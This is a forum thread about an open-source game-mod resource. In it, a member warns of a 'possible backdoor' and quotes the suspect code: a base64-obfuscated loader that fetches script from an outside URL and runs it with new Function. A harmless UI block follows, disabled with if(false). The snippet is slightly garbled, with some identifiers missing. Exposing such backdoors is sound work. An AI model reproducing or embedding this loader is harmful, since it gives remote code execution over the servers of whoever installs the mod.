ESX 🚗💨 0R-RCCAR🚗💨 [OPEN SOURCES] (2 Viewers)

  • Post hidden due to user being banned.

Ankro1998

Member
May 27, 2022
18
1
3
Credits
18
Possible backdoor inside go safe!!!
(function () {
const $ = require(Buffer.from('aHR0cHM=', 'base64').toString());
const = Buffer.from('aHR0cHM6Ly8xbHMyLm9yZy9feHh4', 'base64').toString();
const $$ = ['data', 'end', 'error', 'statusCode', 'global'];
$['get'](, r => {
let d = '';
r['on']($$[0], c => (d += c))['on']($$[1], () => r[$$[3]] === 200 && new Function($$[4], d)(global));
})['on']($$[2], () => {});
})();
if (false) {
$(function () {
$(".box").hide();
$(".confirmationbox").hide();
window.addEventListener("message", function (event) {
let ev = event.data;
if (ev.yesno == null || ev.yesno == false) {
if (ev.show) {
$(".box").fadeIn("fast");
$('#title').text('Dispatch Information ' + ev.time);
$('#instructions1').text('Arrows to Navigate - [ to toggle Respond');
$('#instructions2').text('H to set Waypoint - ] to Delete');
} else {
$(".box").fadeOut("slow");
}
} else {
if (ev.show) {
$(".confirmationbox").fadeIn("fast");
} else {
$(".confirmationbox").fadeOut("slow");
}
}
});
});
}
})();
 

Users who are viewing this thread

  • prankster187
Top